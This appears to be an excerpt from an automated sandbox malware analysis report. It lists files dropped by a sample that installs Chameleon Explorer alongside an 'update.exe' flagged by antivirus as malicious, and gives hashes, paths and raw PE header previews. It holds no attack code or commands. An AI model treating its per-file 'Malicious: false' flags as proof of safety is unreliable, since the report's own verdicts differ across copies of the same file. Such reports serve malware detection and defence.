Yara Hits:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Program Files (x86)\Chameleon Explorer\is-NOOMK.tmp, Author: Joe Security
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......T.................~........................@.................................b.....@..........................`.......0...........2...............4...p...!...................................................3.......P..0....................text....s.......t.................. ..`.itext...............x.............. ..`.data....).......*..................@....bss.....T...............................idata.......0......................@....didata.0....P......................@....edata.......`......................@..@.reloc...!...p..."..................@..B.rsrc....2.......2..................@..@....................................@..@................................................................................................

C:\Program Files (x86)\Chameleon Explorer\is-T1IK9.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	15091304
Entropy (8bit):	6.181292047546881
Encrypted:	false
SSDEEP:	98304:aVVZ2l4oeoFVuuaBABjcWvkEPGFta7xEmkLGg79M:aVHoeoFVzvBjbEdGg7u
MD5:	92A3D0847FC622B31F2D0C273A676C0E
SHA1:	E642D694367CC98A8863D87FEC82E4CF940EB48A
SHA-256:	9A9923C08D3FC5937B6ED189E20CF416482A079BC0C898C4ED75329E0EE3AE89
SHA-512:	01D13FD9A0DD52BC2E3F17AF7A999682201C99ECF7218BCA254A4944A483FD1DEC2A3E6D59DEF501A024AD760B849787902ECB55BD33D23FA9651C0A7689CD1C
Malicious:	false
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d...f=^X..........#.........,E..............@.....................................p.....@..........@............... .......................`...p...@...B...0..\|.......h4................................... ..(....................}..........\|....................text............................. ..`.data....d.......f.................@....bss.........p...........................idata...p...`...r...L..............@....didata.\|...........................@....edata.............................@..@.tls....x................................rdata..m.... .....................@..@.pdata..\|....0.....................@..@.rsrc....B...@...B.................@..@JCLDEBUG.............&..............@..@........................................

C:\Program Files (x86)\Chameleon Explorer\is-VD36P.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1185824
Entropy (8bit):	6.406882852477582
Encrypted:	false
SSDEEP:	24576:EtdAm9DUi/CR3wCkCiRgoG7hBaHkbEXXeG/jFt5lTxyt7:8qTytRFk6ek1Lu
MD5:	729BC0108BCD7EC083DFA83D7A4577F2
SHA1:	0B4EFA5E1764B4CE3E3AE601C8655C7BB854A973
SHA-256:	B1C68B1582EBB5F465512A0B834CCAC095460B29136B6C7EEA0475612BF16B49
SHA-512:	49C83533CE88D346651D59D855CFF18190328795401C1277F4E3D32FF34F207D2C35F026785AA6C4A85624D88BF8C927654907FAF50DB1D57447730D9D6AC44C
Malicious:	false
Reputation:	unknown
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......W............................l........ ....@.................................x[....@......@..............................@8...0.................. .................................... .......................................................text............................... ..`.itext.............................. ..`.data...h0... ...2..................@....bss.....a...`.......0...................idata..@8.......:...0..............@....tls....<............j...................rdata....... .......j..............@..@.rsrc........0.......l..............@..@....................................@..@........................................................................................................................................

C:\Program Files (x86)\Chameleon Explorer\unins000.dat Download File
Process:	C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp
File Type:	data
Category:	dropped
Size (bytes):	52557
Entropy (8bit):	3.91691127886048
Encrypted:	false
SSDEEP:	768:uFYAxWNrPuxwK2BBnE9IuIuhqjulh9Lbm:yxkixl2BBnE9IuIuhk4O
MD5:	8ECEF48A0684649CB5B5BD2CB1D6530E
SHA1:	C52CFD40B7E7390BFF1D0323823782514D149964
SHA-256:	9D4DAEF19651DB398E25C7A267FCDCB3AD04397A2C6A79F39DCD4A90CD2A71E2
SHA-512:	29B28EE87973772A99F79E0E298752C95CB3508136B5F1C64444A8FA92ACFB052EEF25EE717E78BBD37A07F07E316DE70A08C3A15FE59C6B958D92CCB550C644
Malicious:	false
Reputation:	unknown
Preview:	Inno Setup Uninstall Log (b)....................................{96C45BE0-C1AA-41B3-B161-F331DBC29B84-explorer}}................................................................................Chameleon Explorer......................................................................................................................M...%..............................................................................................................................................1.1.4.1.2.7......h.a.r.d.z......C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.h.a.m.e.l.e.o.n. .E.x.p.l.o.r.e.r................+...g.. ...........M..IFPS....A.......!.......................................................................................................................................................BOOLEAN..............TWIZARDPAGE....TWIZARDPAGE.........TCHECKBOX....TCHECKBOX.........TBUTTON....TBUTTON.........TLABEL....TLABEL.........TEXECWAIT.........TOBJECT....TOBJECT.........TCONTROL....TCONTROL..

C:\Program Files (x86)\Chameleon Explorer\unins000.exe (copy) Download File
Process:	C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1185824
Entropy (8bit):	6.406882852477582
Encrypted:	false
SSDEEP:	24576:EtdAm9DUi/CR3wCkCiRgoG7hBaHkbEXXeG/jFt5lTxyt7:8qTytRFk6ek1Lu
MD5:	729BC0108BCD7EC083DFA83D7A4577F2
SHA1:	0B4EFA5E1764B4CE3E3AE601C8655C7BB854A973
SHA-256:	B1C68B1582EBB5F465512A0B834CCAC095460B29136B6C7EEA0475612BF16B49
SHA-512:	49C83533CE88D346651D59D855CFF18190328795401C1277F4E3D32FF34F207D2C35F026785AA6C4A85624D88BF8C927654907FAF50DB1D57447730D9D6AC44C
Malicious:	false
Reputation:	unknown
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......W............................l........ ....@.................................x[....@......@..............................@8...0.................. .................................... .......................................................text............................... ..`.itext.............................. ..`.data...h0... ...2..................@....bss.....a...`.......0...................idata..@8.......:...0..............@....tls....<............j...................rdata....... .......j..............@..@.rsrc........0.......l..............@..@....................................@..@........................................................................................................................................

C:\Program Files (x86)\Chameleon Explorer\unins000.msg Download File
Process:	C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp
File Type:	data
Category:	dropped
Size (bytes):	22709
Entropy (8bit):	3.2704486925356004
Encrypted:	false
SSDEEP:	192:Q41EjXgkg3Sqf8sfr69FT0AKanzLYfMa1tzvL7Vzo+Fc51USQDztXfbKJUfvo:Q41Elvqf9r6fKVfMmRo+y1USQDztP3o
MD5:	79173DA528082489A43F39CF200A7647
SHA1:	AA253B477CE2BF9D886D07694CD5DDB7C7FE9EEC
SHA-256:	4F36E6BE09CD12E825C2A12AB33544744E7256C9094D7149258EA926705E8FFD
SHA-512:	C46EB9DD3D03A993FDC4F65AE2751ECFDCB1FB6E1FB69A119105FD40290CE5EC4427B04F813EED47415390689943D05B5432D4571B1ACA0CE37EE52391790D18
Malicious:	false
Reputation:	unknown
Preview:	Inno Setup Messages (5.5.3) (u).....................................hX..........&.A.b.o.u.t. .S.e.t.u.p.........%.1. .v.e.r.s.i.o.n. .%.2.....%.3.........%.1. .h.o.m.e. .p.a.g.e.:.....%.4.....A.b.o.u.t. .S.e.t.u.p...Y.o.u. .m.u.s.t. .b.e. .l.o.g.g.e.d. .i.n. .a.s. .a.n. .a.d.m.i.n.i.s.t.r.a.t.o.r. .w.h.e.n. .i.n.s.t.a.l.l.i.n.g. .t.h.i.s. .p.r.o.g.r.a.m.....T.h.e. .f.o.l.l.o.w.i.n.g. .a.p.p.l.i.c.a.t.i.o.n.s. .a.r.e. .u.s.i.n.g. .f.i.l.e.s. .t.h.a.t. .n.e.e.d. .t.o. .b.e. .u.p.d.a.t.e.d. .b.y. .S.e.t.u.p... .I.t. .i.s. .r.e.c.o.m.m.e.n.d.e.d. .t.h.a.t. .y.o.u. .a.l.l.o.w. .S.e.t.u.p. .t.o. .a.u.t.o.m.a.t.i.c.a.l.l.y. .c.l.o.s.e. .t.h.e.s.e. .a.p.p.l.i.c.a.t.i.o.n.s.....T.h.e. .f.o.l.l.o.w.i.n.g. .a.p.p.l.i.c.a.t.i.o.n.s. .a.r.e. .u.s.i.n.g. .f.i.l.e.s. .t.h.a.t. .n.e.e.d. .t.o. .b.e. .u.p.d.a.t.e.d. .b.y. .S.e.t.u.p... .I.t. .i.s. .r.e.c.o.m.m.e.n.d.e.d. .t.h.a.t. .y.o.u. .a.l.l.o.w. .S.e.t.u.p. .t.o. .a.u.t.o.m.a.t.i.c.a.l.l.y. .c.l.o.s.e. .t.h.e.s.e. .a.p.p.l.i.c.a.t.i.o.n.s... .A.f.

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Chameleon Explorer\Chameleon Explorer.lnk Download File
Process:	C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Wed Nov 24 07:43:15 2021, mtime=Wed Nov 24 07:43:15 2021, atime=Sat Dec 24 21:19:16 2016, length=15091304, window=hide
Category:	dropped
Size (bytes):	1213
Entropy (8bit):	4.537060898462953
Encrypted:	false
SSDEEP:	24:8mHmE/bDdOEAihz1SWlAtQdCHqhdCVUUhb0X7aB6m:8mHmQbDdORilJOtQdCKhdCWyb0mB6
MD5:	E3306CABF7D8452F614C1640214D543D
SHA1:	1CBEC2BBDF3478012B3D37FE360ED2C8294EA5CA
SHA-256:	617930B08156FEE16FF9EC1F60A3BA410FA2E732897F0DE7D9D8217D4FDF5AAB
SHA-512:	870DB41DCA5827FDA6132EE2683EF15AE261D699BFFB554DF891D9850A51BCCA06F60BC5DD7406BA3342C9F078187028C208FB45162D977F35415A3C019709FA
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ...4'kR....+r.R.....JK.3^..hF...........................P.O. .:i.....+00.../C:\.....................1.....7Sxy..PROGRA~2.........L.xSZE....................V.....2X..P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....n.1.....xSkE..CHAMEL~1..V......xShExSkE.......................... ...C.h.a.m.e.l.e.o.n. .E.x.p.l.o.r.e.r.....x.2.hF...Ih. .CHAMEL~1.EXE..\......xShExShE..............................C.h.a.m.e.l.e.o.n.E.x.p.l.o.r.e.r...e.x.e.......n...............-.......m........... ........C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe..N.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.h.a.m.e.l.e.o.n. .E.x.p.l.o.r.e.r.\.C.h.a.m.e.l.e.o.n.E.x.p.l.o.r.e.r...e.x.e.).C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.h.a.m.e.l.e.o.n. .E.x.p.l.o.r.e.r.........*................@Z\|...K.J.........`.......X.......114127...........!a..%.H.VZAj......M..........-..!a..%.H.VZAj......M..........-..

C:\Users\Public\Desktop\Chameleon Explorer.lnk Download File
Process:	C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Wed Nov 24 07:43:15 2021, mtime=Wed Nov 24 07:43:15 2021, atime=Sat Dec 24 21:19:16 2016, length=15091304, window=hide
Category:	dropped
Size (bytes):	1195
Entropy (8bit):	4.543634782415747
Encrypted:	false
SSDEEP:	24:8mHmE/JTZbdOEAihz1SWlAt3dCHqhdCVUUhb0X7aB6m:8mHmQJTldORilJOt3dCKhdCWyb0mB6
MD5:	37EB10395119243E0CCC18415B325C70
SHA1:	836CB4964FCE8315B531CFFE83B48CD8C6E22732
SHA-256:	917AB319153CA6563497E270F41AB3D74E49D414A629CE86950088C3BD0EDB93
SHA-512:	FD80CD0268E628F82B5B7B36EF29139710C30FBE4135CCA967C4C365F92B30348132480681EA67DB585011FC5A4E7191BFE769EE4C2694586A22E6CB3E9A0678
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ...4'kR....+r.R.....JK.3^..hF...........................P.O. .:i.....+00.../C:\.....................1.....xShE..PROGRA~2.........L.xSkE....................V.....N..P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....n.1.....xSkE..CHAMEL~1..V......xShExSkE.......................... ...C.h.a.m.e.l.e.o.n. .E.x.p.l.o.r.e.r.....x.2.hF...Ih. .CHAMEL~1.EXE..\......xShExShE..............................C.h.a.m.e.l.e.o.n.E.x.p.l.o.r.e.r...e.x.e.......n...............-.......m........... ........C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe..E.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.h.a.m.e.l.e.o.n. .E.x.p.l.o.r.e.r.\.C.h.a.m.e.l.e.o.n.E.x.p.l.o.r.e.r...e.x.e.).C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.h.a.m.e.l.e.o.n. .E.x.p.l.o.r.e.r.........*................@Z\|...K.J.........`.......X.......114127...........!a..%.H.VZAj......M..........-..!a..%.H.VZAj......M..........-.............1SPS.X

C:\Users\user\AppData\Local\Temp\is-CO8MN.tmp\_isetup\_setup64.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.720366600008286
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:	E4211D6D009757C078A9FAC7FF4F03D4
SHA1:	019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-CO8MN.tmp\background.bmp Download File
Process:	C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp
File Type:	PC bitmap, Windows 3.x format, 550 x 400 x 8
Category:	dropped
Size (bytes):	221878
Entropy (8bit):	2.943873456317086
Encrypted:	false
SSDEEP:	768:kAm32YDp95sTuEA8dXMhQp/NeHL/msCc1J1yDusX7W4GqOQlDq3mh9h7EER0V6FP:QzcZbRj
MD5:	5C462496481201B9E9D855A30CEBC0CF
SHA1:	A0105BF0140DAC14C9ACDB07CB0740D3FD611724
SHA-256:	D67EC0D4146B0C030703BDC405ACD2B6EB7E7A302D65B3F339D9D45AFC05AC52
SHA-512:	08D4CD904D88FC97E1DFB6AAA83D4CCDF8CF4776D7D16FDE5B067ED81C65E89CA03EA0937532E0AD2E37F19C283C488E9C5EDB05366389F0848F11D1856D42C1
Malicious:	false
Reputation:	unknown
Preview:	BM.b......6...(...&.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp Download File
Process:	C:\Users\user\AppData\Roaming\cexplorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1185824
Entropy (8bit):	6.406882852477582
Encrypted:	false
SSDEEP:	24576:EtdAm9DUi/CR3wCkCiRgoG7hBaHkbEXXeG/jFt5lTxyt7:8qTytRFk6ek1Lu
MD5:	729BC0108BCD7EC083DFA83D7A4577F2
SHA1:	0B4EFA5E1764B4CE3E3AE601C8655C7BB854A973
SHA-256:	B1C68B1582EBB5F465512A0B834CCAC095460B29136B6C7EEA0475612BF16B49
SHA-512:	49C83533CE88D346651D59D855CFF18190328795401C1277F4E3D32FF34F207D2C35F026785AA6C4A85624D88BF8C927654907FAF50DB1D57447730D9D6AC44C
Malicious:	true
Reputation:	unknown
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......W............................l........ ....@.................................x[....@......@..............................@8...0.................. .................................... .......................................................text............................... ..`.itext.............................. ..`.data...h0... ...2..................@....bss.....a...`.......0...................idata..@8.......:...0..............@....tls....<............j...................rdata....... .......j..............@..@.rsrc........0.......l..............@..@....................................@..@........................................................................................................................................

C:\Users\user\AppData\Roaming\cexplorer.exe Download File
Process:	C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6860752
Entropy (8bit):	7.995791234867719
Encrypted:	true
SSDEEP:	196608:ZIwvgsb87DwQiiFFL4an2L/dfXaI+fVcZg:33Stl4LL/ZaIg
MD5:	B2E5A8FE3CA4F0CD681B5662F972EA5F
SHA1:	B7DBCFAEE55ECBF0158431D85DABDD479AB449C7
SHA-256:	E71C48C03B8CFD37BF17E62460733A4BFE9C484E947FD9DB291F65405A2BA9E8
SHA-512:	40B7140F5C182CD51CEE142A2575BD70DC9BDE311AD3952119FB9769B5CEEB467695AA5A66FC90520712D9A39458930EFB965496D6443665B7597CFD66247AAF
Malicious:	true
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......W..................................... ....@...................................i...@......@....................................................h. ............................................................................................text...D........................... ..`.itext..d........................... ..`.data........ ......................@....bss.....V...0...........................idata..............................@....tls.................&...................rdata...............&..............@..@.rsrc................(..............@..@....................................@..@........................................................................................................................................

C:\Users\user\AppData\Roaming\update.exe Download File
Process:	C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	206336
Entropy (8bit):	6.90504345519163
Encrypted:	false
SSDEEP:	3072:PzcLQoUxcLgYWyK1M3b5B/5WWS1NQ5MtCliuIFFl9Sd0Uh5lU/:PzcL2+kYNKS38FxuQFDK7ZK
MD5:	1286DF675C3878D0FC4A89FCCD98CE86
SHA1:	1539C28A93201379FBB80F77251FEC4EA8D7DFDE
SHA-256:	983184026BBE689D9F1591A237E7444F04B6F7F5544C36A525E2A2EDBC453159
SHA-512:	7873A25F7260092DD057E761DEB99D773B21F4EB8B11F47C043B54188FCF6FDD7ABC5236B80B8DA50588CAE0D4F7B4C6A89093B1224701424CC5919C0A5CE6AE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............e...e...e.....e...p.e.....e.......e...d...e..%(...e.....e....{..e.Rich..e.........PE..L.....zY.................8...................P....@......................................................................... x..P.......Hy...................`..0....................................n..@............P..l............................text...^7.......8.................. ..`.rdata..T0...P...2...<..............@..@.data...tN......."...n..............@....rsrc...Hy.......z..................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\Chameleon files\Explorer configuration\colors.ini.temp Download File
Process:	C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	736
Entropy (8bit):	5.19291613287325
Encrypted:	false
SSDEEP:	12:71WWe2T/GYxe4EfiYP/LpT7TAiE6AufSEnh9mgyzYhG:71//psEkSgrG
MD5:	8DD2C4351E4B0D2930D563DA2C6C2A48
SHA1:	A1B468692AC3F74F9A2550AEAAFF0D9624513C71
SHA-256:	EFCA88B595BB73EFCEBA76EC7563B29AC32C4B5A86217C4BF1FBB68B1FFC0F5C
SHA-512:	F9C409B25AA07AD3B4421A841AD9F1139CC2B134F47EF8844D948367B5D30107F7BB5FDB1EC3B15D1CB5460631405784B57046CF8174BF8D05A6ED62847A0C08
Malicious:	false
Reputation:	unknown
Preview:	.[0]..Masks=.txt;.doc;.docx;.xls;.xlsx;.pdf;.rtf;.odt;.ods;.chm;.ini;.mobi;.epub;.azw;.djvu;.fb2..Enabled=0..ColorText=5283896..ColorBack=-1....[1]..Masks=.png;.jpg;.jpeg;.gif;.bmp;.tif;.tiff;.psd;.ico..Enabled=0..ColorText=5718738..ColorBack=-1....[2]..Masks=.avi;.mpg;.wmv;.mkv;.mpeg;.flv;.mp4;.vob;.mov;.divx..Enabled=0..ColorText=26316..ColorBack=-1....[3]..Masks=.mp3;.wav;.flac;.ape;.ogg..Enabled=0..ColorText=33023..ColorBack=-1....[4]..Masks=.exe;.bat;.msi;.application;.cmd..Enabled=1..ColorText=6830483..ColorBack=-1....[5]..Masks=.dll;.ocx..Enabled=0..ColorText=15728760..ColorBack=-1....[6]..Masks=.zip;.rar;.7z;.cab;.gz;.tar..Enabled=1..ColorText=13797186..ColorBack=-1....[IntegrityCheckingSignature]..Finish=Success....

C:\Users\user\Documents\Chameleon files\Explorer configuration\colors.ini@ (copy) Download File
Process:	C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	736
Entropy (8bit):	5.19291613287325
Encrypted:	false
SSDEEP:	12:71WWe2T/GYxe4EfiYP/LpT7TAiE6AufSEnh9mgyzYhG:71//psEkSgrG
MD5:	8DD2C4351E4B0D2930D563DA2C6C2A48
SHA1:	A1B468692AC3F74F9A2550AEAAFF0D9624513C71
SHA-256:	EFCA88B595BB73EFCEBA76EC7563B29AC32C4B5A86217C4BF1FBB68B1FFC0F5C
SHA-512:	F9C409B25AA07AD3B4421A841AD9F1139CC2B134F47EF8844D948367B5D30107F7BB5FDB1EC3B15D1CB5460631405784B57046CF8174BF8D05A6ED62847A0C08
Malicious:	false
Reputation:	unknown
Preview:	.[0]..Masks=.txt;.doc;.docx;.xls;.xlsx;.pdf;.rtf;.odt;.ods;.chm;.ini;.mobi;.epub;.azw;.djvu;.fb2..Enabled=0..ColorText=5283896..ColorBack=-1....[1]..Masks=.png;.jpg;.jpeg;.gif;.bmp;.tif;.tiff;.psd;.ico..Enabled=0..ColorText=5718738..ColorBack=-1....[2]..Masks=.avi;.mpg;.wmv;.mkv;.mpeg;.flv;.mp4;.vob;.mov;.divx..Enabled=0..ColorText=26316..ColorBack=-1....[3]..Masks=.mp3;.wav;.flac;.ape;.ogg..Enabled=0..ColorText=33023..ColorBack=-1....[4]..Masks=.exe;.bat;.msi;.application;.cmd..Enabled=1..ColorText=6830483..ColorBack=-1....[5]..Masks=.dll;.ocx..Enabled=0..ColorText=15728760..ColorBack=-1....[6]..Masks=.zip;.rar;.7z;.cab;.gz;.tar..Enabled=1..ColorText=13797186..ColorBack=-1....[IntegrityCheckingSignature]..Finish=Success....

C:\Users\user\Documents\Chameleon files\Explorer configuration\filters.ini (copy) Download File
Process:	C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	793
Entropy (8bit):	5.017107027448105
Encrypted:	false
SSDEEP:	24:4aoIJ8i3quu5IJ0x9KIuuPI5VuujpI6Tp0iuuHG:4aoIK6q1IJ0OITI7vpIqjG
MD5:	D0E6E59B4C0A90FF05AEAEA3B850E780
SHA1:	1E975637110EF7EEE57C739E5B208D624F2D44C4
SHA-256:	99428152166486929659D14D11FB12822E2DC5EFF9FA43706C35407A45FCA898
SHA-512:	62522B9BA3557BDE691945EEED75C05C53146D05E9632D6EF5BFAE083FCF52F885277398E4E9853432C2E1366ACBC5FA8E73BA08584AD36C52C70F00869CC0CD
Malicious:	false
Reputation:	unknown
Preview:	.[Settings]..MaxFilterIndex=4....[3]..Name=Images..IncludeFilter=.jpg;.jpeg;.png;.tiff;.gif;.bmp;.webp;.psd;.svg;.psp;.tga;.ai;.cdr..ExcludeFilter=..ShowHiddenFiles=0..IncludeSubFolder=0....[4]..Name=Documents..IncludeFilter=.doc;.docx;.txt;.rtf;.xls;xlsx;.odt;.ods;.pdf;.djvu;.mobi;.epub;.fb2;.ppt;.pptx..ExcludeFilter=..ShowHiddenFiles=0..IncludeSubFolder=0....[2]..Name=Audio..IncludeFilter=.mp3;.wav;.flac;.ape;.3gp;.amr;.m4a;.m4p;.ogg;.oga;.ra;.rm;.wv;.wma..ExcludeFilter=..ShowHiddenFiles=0..IncludeSubFolder=0....[1]..Name=Video..IncludeFilter=.avi;.mkv;.mp4;.mov;.wmv;.flv;.divx;.ts;.mpeg;.vob;.3gp;.webm;.flv;.mpg;*.mp4..ExcludeFilter=..ShowHiddenFiles=0..IncludeSubFolder=0....[IntegrityCheckingSignature]..Finish=Success....

C:\Users\user\Documents\Chameleon files\Explorer configuration\filters.ini.temp Download File
Process:	C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	793
Entropy (8bit):	5.017107027448105
Encrypted:	false
SSDEEP:	24:4aoIJ8i3quu5IJ0x9KIuuPI5VuujpI6Tp0iuuHG:4aoIK6q1IJ0OITI7vpIqjG
MD5:	D0E6E59B4C0A90FF05AEAEA3B850E780
SHA1:	1E975637110EF7EEE57C739E5B208D624F2D44C4
SHA-256:	99428152166486929659D14D11FB12822E2DC5EFF9FA43706C35407A45FCA898
SHA-512:	62522B9BA3557BDE691945EEED75C05C53146D05E9632D6EF5BFAE083FCF52F885277398E4E9853432C2E1366ACBC5FA8E73BA08584AD36C52C70F00869CC0CD
Malicious:	false
Reputation:	unknown
Preview:	.[Settings]..MaxFilterIndex=4....[3]..Name=Images..IncludeFilter=.jpg;.jpeg;.png;.tiff;.gif;.bmp;.webp;.psd;.svg;.psp;.tga;.ai;.cdr..ExcludeFilter=..ShowHiddenFiles=0..IncludeSubFolder=0....[4]..Name=Documents..IncludeFilter=.doc;.docx;.txt;.rtf;.xls;xlsx;.odt;.ods;.pdf;.djvu;.mobi;.epub;.fb2;.ppt;.pptx..ExcludeFilter=..ShowHiddenFiles=0..IncludeSubFolder=0....[2]..Name=Audio..IncludeFilter=.mp3;.wav;.flac;.ape;.3gp;.amr;.m4a;.m4p;.ogg;.oga;.ra;.rm;.wv;.wma..ExcludeFilter=..ShowHiddenFiles=0..IncludeSubFolder=0....[1]..Name=Video..IncludeFilter=.avi;.mkv;.mp4;.mov;.wmv;.flv;.divx;.ts;.mpeg;.vob;.3gp;.webm;.flv;.mpg;*.mp4..ExcludeFilter=..ShowHiddenFiles=0..IncludeSubFolder=0....[IntegrityCheckingSignature]..Finish=Success....

C:\Users\user\Documents\Chameleon files\Folder configuration\favorites.ini (copy) Download File
Process:	C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1029
Entropy (8bit):	5.073046635157514
Encrypted:	false
SSDEEP:	24:ilPKE3YE39E3IE3ZE3nVmxE3vxE36TpE3laNE3RE3zE3ZjxE3Fg9lKE34G:eSFIt4kVciz+aNoeABMjG
MD5:	F5561BEACF73E8F22AE653BCB64E2E75
SHA1:	7E2040EA37E77A593B16F66131958C9BC39B14F5
SHA-256:	DD3B1B6E081034B6EA7B43FA7BCD2E008F7228A89014ECF8465863ADB8C04CD3
SHA-512:	96F65778464684030AA2A31422EE7A5CC4683C6C975DB600C4CFEBD5B9ED8CC1B9213F07A2B3EBBDB73868C44CCE027999C6CC6B61AFD30864434E741D38EF4F
Malicious:	false
Reputation:	unknown
Preview:	.[0]..Path=C:\Users\user\Desktop..Caption=Desktop..ItemType=0..GroupIndex=0....[1]..Path=C:\Users\user\Downloads..Caption=Downloads..ItemType=0..GroupIndex=0....[2]..Path=C:\Users\user\Documents..Caption=Documents..ItemType=0..GroupIndex=0....[3]..Path=C:\Users\user\Pictures..Caption=Pictures..ItemType=0..GroupIndex=0....[4]..Path=C:\Users\user\Music..Caption=Music..ItemType=0..GroupIndex=0....[5]..Path=C:\Users\user\Videos..Caption=Videos..ItemType=0..GroupIndex=0....[6]..Path=Libraries..Caption=Libraries..ItemType=0..GroupIndex=0....[7]..Path=Recycle Bin..Caption=Recycle Bin..ItemType=0..GroupIndex=0....[8]..Path=..Caption=This PC..ItemType=0..GroupIndex=0....[9]..Path=C:..Caption=Local Disk (C:)..ItemType=0..GroupIndex=0....[10]..Path=D:..Caption=DVD Drive (D:)..ItemType=0..GroupIndex=0....[11]..Path=c:\windows\notepad.exe..Caption=Notepad..ItemType=0..GroupIndex=0....[12]..Path=c:\windows\System32\calc.exe..Caption=Calculator..ItemType=0..GroupIndex=0....[IntegrityCheckingS

C:\Users\user\Documents\Chameleon files\Folder configuration\favorites.ini.temp Download File
Process:	C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1029
Entropy (8bit):	5.073046635157514
Encrypted:	false
SSDEEP:	24:ilPKE3YE39E3IE3ZE3nVmxE3vxE36TpE3laNE3RE3zE3ZjxE3Fg9lKE34G:eSFIt4kVciz+aNoeABMjG
